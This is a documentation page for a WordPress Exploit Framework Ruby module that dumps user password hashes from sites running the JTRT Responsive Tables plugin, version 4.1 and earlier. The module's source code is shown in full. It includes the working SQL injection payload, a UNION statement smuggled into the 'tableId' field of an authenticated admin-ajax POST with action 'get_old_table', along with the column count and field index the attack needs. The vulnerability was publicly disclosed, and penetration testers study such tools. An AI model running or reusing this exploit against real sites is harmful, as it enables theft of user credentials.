Class: Wpxf::Auxiliary::JtrtResponsiveTablesHashDump

Inherits:
Module
  • Object
show all
Includes:
WordPress::HashDump
Defined in:
lib/wpxf/modules/auxiliary/hash_dump/jtrt_responsive_tables_hash_dump.rb

Constant Summary

Constants included from WordPress::Options

WordPress::Options::WP_OPTION_CONTENT_DIR

Constants included from Net::HttpOptions

Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST

Instance Attribute Summary

Attributes inherited from Module

#active_workspace, #event_emitter, #payload, #session_cookie

Attributes included from Options

#datastore, #options

Instance Method Summary collapse

Methods included from WordPress::HashDump

#export_path, #hashdump_custom_union_values, #hashdump_prefix_fingerprint_statement, #hashdump_sql_statement, #run, #table_prefix

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods inherited from Module

#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #run, #set_option_value, #unset_option

Methods included from Db::Credentials

#store_credentials

Methods included from ModuleAuthentication

#authenticate_with_wordpress

Methods included from WordPress::Urls

#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc

Methods included from WordPress::Options

#wp_content_dir

Methods included from WordPress::Login

#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body

Methods included from WordPress::Fingerprint

#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version

Methods included from Net::HttpClient

#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri

Methods included from Net::TyphoeusHelper

#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options

Methods included from Net::UserAgent

#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent

Methods included from Versioning::OSVersions

#random_nt_version, #random_osx_version

Methods included from Versioning::BrowserVersions

#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from OutputEmitters

#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning

Methods included from ModuleInfo

#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info

Constructor Details

#initializeJtrtResponsiveTablesHashDump

Returns a new instance of JtrtResponsiveTablesHashDump.



6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
 
# File 'lib/wpxf/modules/auxiliary/hash_dump/jtrt_responsive_tables_hash_dump.rb', line 6

def initialize
  super

  update_info(
    name: 'JTRT Responsive Tables <= 4.1 Authenticated Hash Dump',
    desc: %(
      JTRT Responsive Tables <= 4.1 suffers from an SQL injection vulnerability
      which is exploitable by registered users of any level.

      This module utilises the vulnerability to dump the hashed passwords
      of all users in the database.
    ),
    author: [
      'Lenon Leite', # Disclosure
      'rastating'    # WPXF module
    ],
    references: [
      ['WPVDB', '8953'],
      ['URL', 'http://lenonleite.com.br/en/blog/2017/09/11/jtrt-responsive-tables-wordpress-plugin-sql-injection/']
    ],
    date: 'Nov 11 2017'
  )
end

Instance Method Details

#checkObject 



30
31
32
 
# File 'lib/wpxf/modules/auxiliary/hash_dump/jtrt_responsive_tables_hash_dump.rb', line 30

def check
  check_plugin_version_from_readme('jtrt-responsive-tables', '4.1.1')
end

#hashdump_number_of_colsObject 



62
63
64
 
# File 'lib/wpxf/modules/auxiliary/hash_dump/jtrt_responsive_tables_hash_dump.rb', line 62

def hashdump_number_of_cols
  5
end

#hashdump_request_bodyObject 



52
53
54
55
56
 
# File 'lib/wpxf/modules/auxiliary/hash_dump/jtrt_responsive_tables_hash_dump.rb', line 52

def hashdump_request_body
  {
    'tableId' => "-#{Utility::Text.rand_numeric(2)} UNION #{hashdump_sql_statement} #"
  }
end

#hashdump_request_methodObject 



42
43
44
 
# File 'lib/wpxf/modules/auxiliary/hash_dump/jtrt_responsive_tables_hash_dump.rb', line 42

def hashdump_request_method
  :post
end

#hashdump_request_paramsObject 



46
47
48
49
50
 
# File 'lib/wpxf/modules/auxiliary/hash_dump/jtrt_responsive_tables_hash_dump.rb', line 46

def hashdump_request_params
  {
    'action' => 'get_old_table'
  }
end

#hashdump_visible_field_indexObject 



58
59
60
 
# File 'lib/wpxf/modules/auxiliary/hash_dump/jtrt_responsive_tables_hash_dump.rb', line 58

def hashdump_visible_field_index
  2
end

#requires_authenticationObject 



34
35
36
 
# File 'lib/wpxf/modules/auxiliary/hash_dump/jtrt_responsive_tables_hash_dump.rb', line 34

def requires_authentication
  true
end

#reveals_one_row_per_requestObject 



38
39
40
 
# File 'lib/wpxf/modules/auxiliary/hash_dump/jtrt_responsive_tables_hash_dump.rb', line 38

def reveals_one_row_per_request
  true
end

#vulnerable_urlObject 



66
67
68
 
# File 'lib/wpxf/modules/auxiliary/hash_dump/jtrt_responsive_tables_hash_dump.rb', line 66

def vulnerable_url
  wordpress_url_admin_ajax
end